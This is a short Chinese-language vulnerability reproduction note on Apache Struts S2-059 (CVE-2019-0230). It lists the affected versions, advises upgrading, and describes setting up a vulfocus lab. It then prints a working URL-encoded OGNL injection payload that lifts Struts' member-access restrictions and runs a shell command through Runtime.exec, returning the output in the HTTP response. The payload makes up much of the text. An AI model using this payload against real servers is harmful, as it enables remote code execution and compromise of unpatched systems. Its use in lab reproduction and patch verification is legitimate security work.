漏洞描述
Apache Struts于2020年8月13日披露 S2-059 Struts 远程代码执行漏洞(CVE-2019-0230),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。腾讯安全专家提醒Apache Struts用户尽快升级到2.5.22或以上版本,避免遭遇黑客攻击。
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架,应用十分广泛。
影响版本
Apache Struts 2.0.0 - 2.5.20
复现步骤
使用vulfocus搭建漏洞环境
POC利用:
1 | %25{%23_memberAccess.allowPrivateAccess%3dtrue,%23_memberAccess.allowStaticMethodAccess%3dtrue,%23_memberAccess.excludedClasses%3d%23_memberAccess.acceptProperties,%23_memberAccess.excludedPackageNamePatterns%3d%23_memberAccess.acceptProperties,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23a%3d%40java.lang.Runtime%40getRuntime(),%23s%3dnew+java.util.Scanner(%23a.exec('ls').getInputStream()).useDelimiter('\\\\A'),%23str%3d%23s.hasNext()%3f%23s.next()%3a'',%23res.print(%23str),%23res.close() |